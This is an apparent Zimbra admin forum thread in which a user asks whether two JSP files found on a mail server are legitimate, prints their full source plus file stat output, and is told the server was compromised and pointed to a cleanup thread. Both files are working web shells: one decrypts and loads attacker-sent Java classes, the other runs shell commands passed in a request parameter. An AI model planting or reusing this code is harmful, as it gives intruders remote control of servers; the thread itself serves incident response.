XZimbra.jsp and AJAX.jsp

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
Post Reply
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

XZimbra.jsp and AJAX.jsp

Post by mqaroush »

Hello
Are these files are zimbra file or script created by hacker
/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp and the content of it is:


Code: Select all

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(
pageContext);%>
/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp and the content is :

Code: Select all

<%if("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>
Top
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: XZimbra.jsp and AJAX.jsp

Post by mqaroush »

more about them

Code: Select all

 stat /opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
  File: `/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp'
  Size: 651             Blocks: 8          IO Block: 4096   regular file
Device: fd04h/64772d    Inode: 90579419    Links: 1
Access: (0640/-rw-r-----)  Uid: (  496/  zimbra)   Gid: (  493/  zimbra)
Access: 2019-05-13 10:32:06.979040738 +0300
Modify: 2019-05-06 08:45:01.300197279 +0300
Change: 2019-05-06 08:45:01.300197279 +0300
and

Code: Select all

 stat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
  File: `/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp'
  Size: 351             Blocks: 8          IO Block: 4096   regular file
Device: fd04h/64772d    Inode: 90579420    Links: 1
Access: (0640/-rw-r-----)  Uid: (  496/  zimbra)   Gid: (  493/  zimbra)
Access: 2019-05-14 10:31:38.332031927 +0300
Modify: 2019-05-08 09:59:27.755179196 +0300
Change: 2019-05-08 09:59:27.755179196 +0300
Top
Bittone
Posts: 21
Joined: Mon Sep 05, 2016 4:30 pm

Re: XZimbra.jsp and AJAX.jsp

Post by Bittone »

Hello mqaroush,
bad news: you have been hacked.
good news: here you can find everything you need to clean up your server viewtopic.php?f=15&t=65932 .
Now as a best practice you should migrate all to a new VM/Server but in some cases that's not feasible so.. good luck.
Bye
A.T.
Top
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: XZimbra.jsp and AJAX.jsp

Post by mqaroush »

are they zimbra files and edited by hacker?? or new files created by Hackers??
Can i delete those file or not??
Top
Bittone
Posts: 21
Joined: Mon Sep 05, 2016 4:30 pm

Re: XZimbra.jsp and AJAX.jsp

Post by Bittone »

Hello mquaroush,
unfortunately there is no easy answer since the hacking is more complex than just two files , so you MUST read all the thread in order to fully understand how far the hack went.
Deleting a couple of files is NOT the answer you are looking for since without other necessary actions it will leave your system open for future hacks.
So you must :
1) read the thread (and you will learn many things by doing so);
2) understand in what form your system was compromised;
3) fix and patch your system in order not to be a target any more.
Bye

A.T.
Top
Post Reply

Return to “Administrators”